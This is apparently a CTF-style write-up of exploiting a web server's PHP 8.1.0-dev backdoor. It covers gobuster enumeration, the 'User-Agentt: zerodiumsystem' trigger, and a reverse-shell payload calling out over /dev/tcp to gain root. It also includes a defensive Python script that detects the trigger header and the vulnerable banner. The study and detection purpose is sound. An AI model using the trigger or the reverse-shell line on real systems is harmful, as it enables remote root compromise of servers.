Something seems a little off with the server.
Enumeration
Found only port 80 open with nmap scan.
Website jumps right to an admin portal, but 90% of the functionality is bogus.
I started a gobuster scan and it died immediately because it was getting 200 responses for directories that don't exist. A bit of checking showed that for directories that don't exist the server returns the main admin portal, but for directories that DO exist it returns a 404. I confirmed this by loading a CSS file from the css/ directory and then getting a 404 for the css directory itself. Interestingly, file behaviour is the opposite: when a file exists a 200 code is still sent, and a 404 when a file does not exist.
Modified the gobuster command to accept 404s and exclude the response length associated with the admin portal while searching for directories, and ran a second gobuster scan looking for file extensions.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.70.119 --exclude-length="42131" -b 500
While poking around the site I noticed that the main page included the X-Powered-By: PHP/8.1.0-dev header. A quick Google search reveals an exploit for this version of PHP.
Including the header User-Agentt: zerodiumsystem('cmd'); in a request will execute system commands.
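The two tells described above (the PHP/8.1.0-dev banner in responses and the misspelled User-Agentt header containing the "zerodium" marker in requests) are easy to spot from the defensive side. The following is an added example, not code from the writeup: it parses raw HTTP message heads as a reverse proxy or WAF capture would record them and flags both indicators. The sample requests and response are constructed here; the hostname target.example is a placeholder.

```python
"""Flag the PHP 8.1.0-dev backdoor trigger in captured requests and the
tell-tale X-Powered-By banner in responses (added example, not from the writeup)."""
import re
from typing import Dict, List

# Constructed sample captures: raw request heads as a proxy/WAF would log them.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: target.example\r\nUser-Agent: curl/8.0\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n",
    # header names are case-insensitive, and so is the backdoor's marker check
    "GET / HTTP/1.1\r\nHost: target.example\r\nuser-agentt: ZeroDiumsystem('whoami');\r\n\r\n",
]

# Constructed sample response advertising the backdoored dev build.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache/2.4.52\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP message head into a dict keyed by lower-cased header name."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request/status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def is_backdoor_trigger(raw_request: str) -> bool:
    """True if the request carries the trigger: a 'User-Agentt' header
    (note the double t) whose value contains the 'zerodium' marker."""
    value = parse_headers(raw_request).get("user-agentt", "")
    return "zerodium" in value.lower()


def has_vulnerable_banner(raw_response: str) -> bool:
    """True if the response's X-Powered-By header names the backdoored build."""
    banner = parse_headers(raw_response).get("x-powered-by", "")
    return re.fullmatch(r"PHP/8\.1\.0-dev", banner) is not None


def scan_requests(requests: List[str]) -> List[int]:
    """Return the indexes of captured requests that carry the trigger."""
    return [i for i, r in enumerate(requests) if is_backdoor_trigger(r)]


if __name__ == "__main__":
    print("flagged requests:", scan_requests(SAMPLE_REQUESTS))          # [1, 2]
    print("vulnerable banner:", has_vulnerable_banner(SAMPLE_RESPONSE))  # True
```

Standard combined access logs do not record arbitrary request headers, so a detection like this needs the header in scope: on Apache the `%{User-Agentt}i` LogFormat directive writes that specific header to the log, and a proxy or WAF in front of the server sees the full request head. The banner check is the simpler control: any server still answering with PHP/8.1.0-dev is running a build that should not exist in production.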
Exploit
Using the User-Agentt exploit we are able to see that PHP is running as root (so stupid), and thus we can do basically anything we want already, including spawning reverse root shells, which is exactly what I did.
User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.0.0.1/9999 0>&1"');
The flag is in /flag.txt
What is the flag?
flag{********************************}